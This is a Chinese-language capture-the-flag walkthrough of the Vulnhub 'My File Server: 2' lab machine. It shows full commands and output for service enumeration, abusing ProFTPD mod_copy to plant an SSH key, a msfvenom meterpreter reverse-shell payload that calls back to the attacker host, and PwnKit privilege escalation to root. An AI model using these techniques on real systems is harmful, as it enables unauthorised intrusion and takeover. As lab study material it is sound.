Vulnhub之My File Server 2靶机详细测试过程(利用Metasploit实现本地提权相当的爽)
My File Server 2
作者:jason huawen
靶机信息
名称:My File Server: 2
地址:
https://www.vulnhub.com/entry/my-file-server-2,442/
将上述靶机的虚拟机导入到VirtualBox,并设置网络模式为host-only,与攻击机Kali Linux为同一局域网。
识别目标主机IP地址
─(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer2]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:11 1 60 Unknown vendor
192.168.56.100 08:00:27:15:69:14 1 60 PCS Systemtechnik GmbH
192.168.56.104 08:00:27:4f:61:58 1 60 PCS Systemtechnik GmbH
利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.104
NMAP扫描
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer2]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.104 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-04-02 21:40 EDT
Nmap scan report for bogon (192.168.56.104)
Host is up (0.00052s latency).
Not shown: 64445 filtered tcp ports (no-response), 78 filtered tcp ports (host-prohibited), 1004 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx 3 0 0 16 Feb 19 2020 pub [NSE: writeable]
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.56.230
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.2 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 75:fa:37:d1:62:4a:15:87:7e:21:83:b9:2f:ff:04:93 (RSA)
| 256 b8:db:2c:ca:e2:70:c3:eb:9a:a8:cc:0e:a2:1c:68:6b (ECDSA)
|_ 256 66:a3:1b:55:ca:c2:51:84:41:21:7f:77:40:45:d4:9f (ED25519)
80/tcp open http Apache httpd 2.4.6 ((CentOS))
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: My File Server
|_http-server-header: Apache/2.4.6 (CentOS)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100003 3,4 2049/udp nfs
| 100003 3,4 2049/udp6 nfs
| 100005 1,2,3 20048/tcp mountd
| 100005 1,2,3 20048/tcp6 mountd
| 100005 1,2,3 20048/udp mountd
| 100005 1,2,3 20048/udp6 mountd
| 100021 1,3,4 35080/tcp nlockmgr
| 100021 1,3,4 40393/udp6 nlockmgr
| 100021 1,3,4 45446/tcp6 nlockmgr
| 100021 1,3,4 60480/udp nlockmgr
| 100024 1 36358/udp6 status
| 100024 1 48374/udp status
| 100024 1 51953/tcp status
| 100024 1 58193/tcp6 status
| 100227 3 2049/tcp nfs_acl
| 100227 3 2049/tcp6 nfs_acl
| 100227 3 2049/udp nfs_acl
|_ 100227 3 2049/udp6 nfs_acl
445/tcp open netbios-ssn Samba smbd 4.9.1 (workgroup: SAMBA)
2049/tcp open nfs_acl 3 (RPC #100227)
2121/tcp open ftp ProFTPD 1.3.5
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: ERROR
20048/tcp open mountd 1-3 (RPC #100005)
MAC Address: 08:00:27:4F:61:58 (Oracle VirtualBox virtual NIC)
Service Info: Host: FILESERVER; OS: Unix
Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2023-04-03T01:41:43
|_ start_date: N/A
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.9.1)
| Computer name: localhost
| NetBIOS computer name: FILESERVER\x00
| Domain name: \x00
| FQDN: localhost
|_ System time: 2023-04-03T07:11:44+05:30
|_clock-skew: mean: -1h49m59s, deviation: 3h10m30s, median: -1s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 87.49 seconds
获得Shell
由于目标主机有多个开放端口,因此需要逐一对各个端口进行信息收集。
端口21
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer2]
└─$ ftp 192.168.56.104
Connected to 192.168.56.104.
220 (vsFTPd 3.0.2)
Name (192.168.56.104:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
229 Entering Extended Passive Mode (|||5547|).
150 Here comes the directory listing.
drwxr-xr-x 3 0 0 16 Feb 18 2020 .
drwxr-xr-x 3 0 0 16 Feb 18 2020 ..
drwxrwxrwx 3 0 0 16 Feb 19 2020 pub
226 Directory send OK.
ftp> cd pub
250 Directory successfully changed.
ftp> ls -alh
229 Entering Extended Passive Mode (|||5861|).
150 Here comes the directory listing.
drwxrwxrwx 3 0 0 16 Feb 19 2020 .
drwxr-xr-x 3 0 0 16 Feb 18 2020 ..
drwxr-xr-x 9 0 0 4096 Feb 19 2020 log
226 Directory send OK.
ftp> cd log
250 Directory successfully changed.
ftp> ls -alh
229 Entering Extended Passive Mode (|||5001|).
150 Here comes the directory listing.
drwxr-xr-x 9 0 0 4096 Feb 19 2020 .
drwxrwxrwx 3 0 0 16 Feb 19 2020 ..
drwxr-xr-x 2 0 0 4096 Feb 19 2020 anaconda
drwxr-x--- 2 0 0 22 Feb 19 2020 audit
-rw-r--r-- 1 0 0 7033 Feb 19 2020 boot.log
-rw------- 1 0 0 10752 Feb 19 2020 btmp
-rw-r--r-- 1 0 0 9161 Feb 19 2020 cron
-rw-r--r-- 1 0 0 31971 Feb 19 2020 dmesg
-rw-r--r-- 1 0 0 31971 Feb 19 2020 dmesg.old
drwxr-xr-x 2 0 0 6 Feb 19 2020 glusterfs
drwx------ 2 0 0 39 Feb 19 2020 httpd
-rw-r--r-- 1 0 0 292584 Feb 19 2020 lastlog
-rw------- 1 0 0 3764 Feb 19 2020 maillog
-rw------- 1 0 0 1423423 Feb 19 2020 messages
drwx------ 2 0 0 6 Feb 19 2020 ppp
drwx------ 4 0 0 43 Feb 19 2020 samba
-rw------- 1 0 0 63142 Feb 19 2020 secure
-rw------- 1 0 0 0 Feb 19 2020 spooler
-rw------- 1 0 0 0 Feb 19 2020 tallylog
drwxr-xr-x 2 0 0 22 Feb 19 2020 tuned
-rw-r--r-- 1 0 0 58752 Feb 19 2020 wtmp
-rw------- 1 0 0 100 Feb 19 2020 xferlog
-rw------- 1 0 0 18076 Feb 19 2020 yum.log
226 Directory send OK.
虽然目标主机允许匿名用户访问,但是目录中的文件没有太大价值。
端口445
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer2]
└─$ smbclient -L 192.168.56.104
Password for [WORKGROUP\kali]:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
smbdata Disk smbdata
smbuser Disk smbuser
IPC$ IPC IPC Service (Samba 4.9.1)
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 192.168.56.104 failed (Error NT_STATUS_HOST_UNREACHABLE)
Unable to connect with SMB1 -- no workgroup available
有两个共享目录smbdata, smbuser
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer2]
└─$ smbclient //192.168.56.104/smbdata
Password for [WORKGROUP\kali]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri Feb 21 01:50:09 2020
.. D 0 Tue Feb 18 06:47:54 2020
anaconda D 0 Tue Feb 18 06:48:15 2020
audit D 0 Tue Feb 18 06:48:15 2020
boot.log N 6120 Tue Feb 18 06:48:16 2020
btmp N 384 Tue Feb 18 06:48:16 2020
cron N 4813 Tue Feb 18 06:48:16 2020
dmesg N 31389 Tue Feb 18 06:48:16 2020
dmesg.old N 31389 Tue Feb 18 06:48:16 2020
glusterfs D 0 Tue Feb 18 06:48:16 2020
lastlog N 292292 Tue Feb 18 06:48:16 2020
maillog N 1982 Tue Feb 18 06:48:16 2020
messages N 684379 Tue Feb 18 06:48:17 2020
ppp D 0 Tue Feb 18 06:48:17 2020
samba D 0 Tue Feb 18 06:48:17 2020
secure N 11937 Tue Feb 18 06:48:17 2020
spooler N 0 Tue Feb 18 06:48:17 2020
tallylog N 0 Tue Feb 18 06:48:17 2020
tuned D 0 Tue Feb 18 06:48:17 2020
wtmp N 25728 Tue Feb 18 06:48:17 2020
xferlog N 100 Tue Feb 18 06:48:17 2020
yum.log N 10915 Tue Feb 18 06:48:17 2020
sshd_config N 3906 Wed Feb 19 02:46:38 2020
authorized_keys A 389 Fri Feb 21 01:50:09 2020
19976192 blocks of size 1024. 18285180 blocks available
smb: \> get authorized_keys
getting file \authorized_keys of size 389 as authorized_keys (3.5 KiloBytes/sec) (average 3.5 KiloBytes/sec)
smb: \> pwd
Current directory is \\192.168.56.104\smbdata\
smb: \> put test.txt
putting file test.txt as \test.txt (5.9 kb/s) (average 5.9 kb/s)
- 允许上传文件到smbdata目录,这点很重要,后续可将特定的文件上传至该目录
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer2]
└─$ smbclient //192.168.56.104/smbuser
Password for [WORKGROUP\kali]:
Anonymous login successful
tree connect failed: NT_STATUS_ACCESS_DENIED
- 不允许匿名访问smbuser目录
─(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer2]
└─$ enum4linux 192.168.56.104
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\smbuser (Local User)
利用enum4linux识别出用户名smbuser
端口2121
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer2]
└─$ ftp 192.168.56.104 -P 2121
Connected to 192.168.56.104.
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [192.168.56.104]
Name (192.168.56.104:kali): anonymous
331 Anonymous login ok, send your complete email address as your password
Password:
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
229 Entering Extended Passive Mode (|||65233|)
ftp: Can't connect to `192.168.56.104:65233': No route to host
200 EPRT command successful
150 Opening ASCII mode data connection for file list
drwxr-xr-x 3 root root 16 Feb 18 2020 .
drwxr-xr-x 3 root root 16 Feb 18 2020 ..
drwxrwxrwx 3 root root 16 Feb 19 2020 pub
226 Transfer complete
ftp> cd pub
250 CWD command successful
ftp> ls -alh
200 EPRT command successful
150 Opening ASCII mode data connection for file list
drwxrwxrwx 3 root root 16 Feb 19 2020 .
drwxr-xr-x 3 root root 16 Feb 18 2020 ..
drwxr-xr-x 9 root root 4.0k Feb 19 2020 log
226 Transfer complete
ftp> cd log
250 CWD command successful
ftp> ls -alh
200 EPRT command successful
150 Opening ASCII mode data connection for file list
drwxr-xr-x 9 root root 4.0k Feb 19 2020 .
drwxrwxrwx 3 root root 16 Feb 19 2020 ..
drwxr-xr-x 2 root root 4.0k Feb 19 2020 anaconda
drwxr-x--- 2 root root 22 Feb 19 2020 audit
-rw-r--r-- 1 root root 6.9k Feb 19 2020 boot.log
-rw------- 1 root root 10.5k Feb 19 2020 btmp
-rw-r--r-- 1 root root 8.9k Feb 19 2020 cron
-rw-r--r-- 1 root root 31.2k Feb 19 2020 dmesg
-rw-r--r-- 1 root root 31.2k Feb 19 2020 dmesg.old
drwxr-xr-x 2 root root 6 Feb 19 2020 glusterfs
drwx------ 2 root root 39 Feb 19 2020 httpd
-rw-r--r-- 1 root root 285.7k Feb 19 2020 lastlog
-rw------- 1 root root 3.7k Feb 19 2020 maillog
-rw------- 1 root root 1.4M Feb 19 2020 messages
drwx------ 2 root root 6 Feb 19 2020 ppp
drwx------ 4 root root 43 Feb 19 2020 samba
-rw------- 1 root root 61.7k Feb 19 2020 secure
-rw------- 1 root root 0 Feb 19 2020 spooler
-rw------- 1 root root 0 Feb 19 2020 tallylog
drwxr-xr-x 2 root root 22 Feb 19 2020 tuned
-rw-r--r-- 1 root root 57.4k Feb 19 2020 wtmp
-rw------- 1 root root 100 Feb 19 2020 xferlog
-rw------- 1 root root 17.7k Feb 19 2020 yum.log
226 Transfer complete
-
允许匿名FTP访问
-
目录内容与21端口已知
──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer2]
└─$ searchsploit ProFTPD 1.3.5
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
ProFTPd 1.3.5 - 'mod_copy' Command Execution (Metasploit) | linux/remote/37262.rb
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution | linux/remote/36803.py
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution (2) | linux/remote/49908.py
ProFTPd 1.3.5 - File Copy | linux/remote/36742.txt
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
- 存在命令执行漏洞
但是这个漏洞利用metasploit执行没有成功,还是需要利用mod copy漏洞,将本地生成的id_rsa.pub文件上传至smbuser的家目录下,
首先利用smb协议将id_rsa.pub上传至/smbdata目录下,然你利用mod copy漏洞移动该文件并重命名为authorized_keys
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer2]
└─$ ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/kali/.ssh/id_rsa): id_rsa
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in id_rsa
Your public key has been saved in id_rsa.pub
The key fingerprint is:
SHA256:GXPq6h/MYwYkQIZ6kkCZjVeQq3kZuNlsHcLf+L0RXfw kali@kali
The key's randomart image is:
+---[RSA 3072]----+
|.+O.+. |
|o= = . |
|o.+ o . o . o |
|+..= + *. . . |
| oB * = S. . E |
| = * + * . |
| o . X. |
| = +. |
| .o.... |
+----[SHA256]-----+
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer2]
└─$ smbclient //192.168.56.104/smbdata
Password for [WORKGROUP\kali]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> put id_rsa.pub
putting file id_rsa.pub as \id_rsa.pub (137.4 kb/s) (average 137.5 kb/s)
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer2]
└─$ telnet 192.168.56.104 2121
Trying 192.168.56.104...
Connected to 192.168.56.104.
Escape character is '^]'.
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [192.168.56.104]
SITE CPFR /smbdata/id_rsa.pub
350 File or directory exists, ready for destination name
SITE CPTO /home/smbuser/.ssh/authorized_keys
250 Copy successful
这样就利用了ProFTPd的mod copy漏洞将id_rsa.pub公钥文件上传至smbuser的家目录
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer2]
└─$ ssh -i id_rsa smbuser@192.168.56.104
##############################################################################################
# Armour Infosec #
# --------- www.armourinfosec.com ------------ #
# My File Server - 2 #
# Designed By :- Akanksha Sachin Verma #
# Twitter :- @akankshavermasv #
##############################################################################################
Last login: Fri Feb 21 12:39:36 2020
[smbuser@fileserver ~]$ id
uid=1000(smbuser) gid=1000(smbuser) groups=1000(smbuser)
[smbuser@fileserver ~]$
这样我们成功的得到了用户smbuser的Shell
提权
接下来用metaploit工具进行提权,首先利用msfvenom工具构建payload:
$ msfvenom -p linux/x86/meterpreter_reverse_tcp LHOST=192.168.56.230 LPORT=6666 -f elf -o escalator.elf
将上述escalator.elf上传至目标主机的/tmp目录,并添加可执行权限
同时在Kali Linux上启动msfconsole,
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload linux/x86/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.56.230
LHOST => 192.168.56.230
msf6 exploit(multi/handler) > set LPORT 6666
LPORT => 6666
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.56.230:6666
[*] Meterpreter session 1 opened (192.168.56.230:6666 -> 192.168.56.104:41659) at 2023-04-02 22:39:49 -0400
这样就得到了meterpreter session,利用这个Meterpreter session进行提权
meterpreter > run post/multi/recon/local_exploit_suggester
[*] 192.168.56.104 - Collecting local exploits for x86/linux...
[*] 192.168.56.104 - 167 exploit checks are being tried...
[+] 192.168.56.104 - exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec: The target is vulnerable.
[+] 192.168.56.104 - exploit/linux/local/netfilter_priv_esc_ipv4: The target appears to be vulnerable.
[+] 192.168.56.104 - exploit/linux/local/network_manager_vpnc_username_priv_esc: The service is running, but could not be validated.
[+] 192.168.56.104 - exploit/linux/local/pkexec: The service is running, but could not be validated.
[+] 192.168.56.104 - exploit/linux/local/ptrace_sudo_token_priv_esc: The service is running, but could not be validated.
[+] 192.168.56.104 - exploit/linux/local/su_login: The target appears to be vulnerable.
[*] Running check method for exploit 48 / 48
[*] 192.168.56.104 - Valid modules for session 1:
============================
# Name Potentially Vulnerable? Check Result
- ---- ----------------------- ------------
1 exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec Yes The target is vulnerable.
2 exploit/linux/local/netfilter_priv_esc_ipv4 Yes The target appears to be vulnerable.
3 exploit/linux/local/network_manager_vpnc_username_priv_esc Yes The service is running, but could not be validated.
4 exploit/linux/local/pkexec Yes The service is running, but could not be validated.
5 exploit/linux/local/ptrace_sudo_token_priv_esc Yes The service is running, but could not be validated.
6 exploit/linux/local/su_login Yes The target appears to be vulnerable.
有多个模块可以用于提权,选择第一个
meterpreter > use exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > show options
Module options (exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec):
Name Current Setting Required Description
---- --------------- -------- -----------
PKEXEC_PATH no The path to pkexec binary
SESSION yes The session to run this module on
WRITABLE_DIR /tmp yes A directory where we can write files
Payload options (linux/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.0.2.15 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 x86_64
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set LHOST 192.168.56.230
LHOST => 192.168.56.230
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set LPORT 8888
LPORT => 8888
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set SESSION 1
SESSION => 1
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > run
[*] Started reverse TCP handler on 192.168.56.230:8888
[*] Running automatic check ("set AutoCheck false" to disable)
[!] Verify cleanup of /tmp/.alwwwbblxxel
[+] The target is vulnerable.
[*] Writing '/tmp/.arzick/ndpnoo/ndpnoo.so' (548 bytes) ...
[!] Verify cleanup of /tmp/.arzick
[*] Sending stage (3020772 bytes) to 192.168.56.104
[+] Deleted /tmp/.arzick/ndpnoo/ndpnoo.so
[+] Deleted /tmp/.arzick/.bawgxle
[+] Deleted /tmp/.arzick
[*] Meterpreter session 2 opened (192.168.56.230:8888 -> 192.168.56.104:47993) at 2023-04-02 22:45:10 -0400
id
meterpreter > id
[-] Unknown command: id
meterpreter > getuid
Server username: root
meterpreter > shell
Process 22664 created.
Channel 1 created.
id
uid=0(root) gid=0(root) groups=0(root),1000(smbuser)
cd /root
ls -alh
total 44K
drwxr--r--. 4 root root 4.0K Feb 21 2020 .
dr-xr-xr-x. 18 root root 4.0K Feb 18 2020 ..
-rwxr--r--. 1 root root 131 Feb 21 2020 .bash_history
-rwxr--r--. 1 root root 18 Dec 29 2013 .bash_logout
-rwxr--r--. 1 root root 176 Dec 29 2013 .bash_profile
-rwxr--r--. 1 root root 176 Dec 29 2013 .bashrc
-rwxr--r--. 1 root root 100 Dec 29 2013 .cshrc
drwxr--r--. 3 root root 18 Feb 18 2020 .pki
drwxr--r-- 2 root root 6 Feb 19 2020 .ssh
-rwxr--r--. 1 root root 129 Dec 29 2013 .tcshrc
-rwxr--r-- 1 root root 6.2K Feb 21 2020 .viminfo
-rwxr--r-- 1 nobody nobody 48 Feb 20 2020 proof.txt
cat proof.txt
Best of Luck
af52e0163b03cbf7c6dd146351594a43
至此拿到了root shell和root flag.
经验教训
-
当遇到靶机有proFTPD时,那么很有可能需要利用mod_copy漏洞拷贝文件实现Shell的获取
-
虽然searchsploit本身直接给出了proFTPD 1.3.5版本的可执行命令漏洞,但是并没有成功。
-
可以用smb协议将所创建的id_rsa.pub公钥文件长传之smbdata目录,注意这里的smbdata目录为根下面的一级目录,或者说是绝对路径,然后利用proFTPD将该文件拷贝(并重命名)到/home/smbuser/.ssh/目录,因为通过enum4linux工具已经知道了目标主机存在用户名smbuser
-
本靶机利用了metasploit工具来实现本地提权,感觉比较爽。